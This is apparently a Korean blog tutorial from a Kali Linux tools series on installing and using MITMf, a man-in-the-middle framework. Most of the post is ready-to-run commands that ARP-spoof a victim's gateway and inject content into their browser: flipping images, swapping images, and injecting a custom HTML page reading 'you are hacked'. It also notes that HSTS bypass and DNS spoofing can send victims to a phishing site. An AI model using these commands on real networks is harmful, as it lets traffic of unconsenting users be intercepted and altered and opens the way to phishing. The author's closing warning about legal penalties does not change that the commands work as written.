Self-Improvement
MITMF 툴 기본 사용법(중간자 공격) 본문
*MITMf 설치
http://webgithub.com/byt3bl33d3r/MITMf
#git clone http://webgithub.com/byt3bl33d3r/MITMf.git
#apt-get install python-dev python-setuptools libpcap0.8-dev libnetfilter-queue-dev libssl-dev libjpeg-dev libxml2-dev libxslt1-dev libcapstone3 libcapstone-dev libffi-dev file
#pip install virtualenvwrapper
#cd MITMf && git submodule init && git submodule update --recursive
#pip install -r requirements.txt
설치 끝
*MITMf 사용
1. 피해자의 브라우저의 이미지를 거꾸로 나오게 하는 명령어
#python mitmf.py -i eth0 --spoof --arp --gateway <IP> --target <IP> --upsidedownternet
피해자 브라우저
2. 피해자의 브라우저에서 내가 지정한 html 문서가 출력되게끔 하는 명령어 (http에만 가능, google 경우엔 --hsts와 --dns(피싱사이트)를 같이 사용)
index.html 파일 소스(인터넷에서 긁어옴)
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 | <!doctype html> <html lang="ko"> <head> <meta charset="utf-8"> <style> body { margin: 0px; padding: 0px; } .jbTitle { text-align: center; } .jbMenu { text-align: center; background-color: red; padding: 10px 0px; width: 100%; } .jbContent { height: 2000px; } .jbFixed { position: fixed; top: 0px; } </style> <script> $( document ).ready( function() { var jbOffset = $( '.jbMenu' ).offset(); $( window ).scroll( function() { if ( $( document ).scrollTop() > jbOffset.top ) { $( '.jbMenu' ).addClass( 'jbFixed' ); } else { $( '.jbMenu' ).removeClass( 'jbFixed' ); } }); } ); </script> </head> <body> <div class="jbTitle"> <h1>Hacking</h1> </div> <div class="jbMenu"> <p> If you see this article, you are hacked. </p> </div> <div class="jbContent"> </div> </body> </html> | cs |
#python mitmf.py -i eth0 --spoof --arp --gateway <IP> --target <IP> --inject --html-file <Path>
피해자 브라우저
3. 피해자 브라우저의 이미지들을 변경하기 (http에서만 가능)
#python mitmf.py -i eth0 --spoof --arp --gateway <IP> --target <IP> --imgrand --img-dir <Dir Path>
이 외에도 여러가지 옵션들이 존재하니 공식 사이트에서 확인.
※위 실습은 테스트 용으로 진행하였으며 공공장소에서 아무한테나 사용하시면 처벌 받을 수 있습니다.
'Kali Linux > Tools 실습' 카테고리의 다른 글
스테가노그래피 Steghide, StegCracker 툴 사용법 (0) | 2019.04.09 |
---|---|
Nmap 스크립트 모듈 향상(Nmap-Vulners, Vulscan) (0) | 2019.01.03 |
해시 알고리즘 종류 알아내기( hash-identifier) (0) | 2018.10.23 |
kali에서 printer 해킹 툴(PRET) (0) | 2018.10.20 |
miranda(upnp : 포트포워딩) 툴 (0) | 2018.10.20 |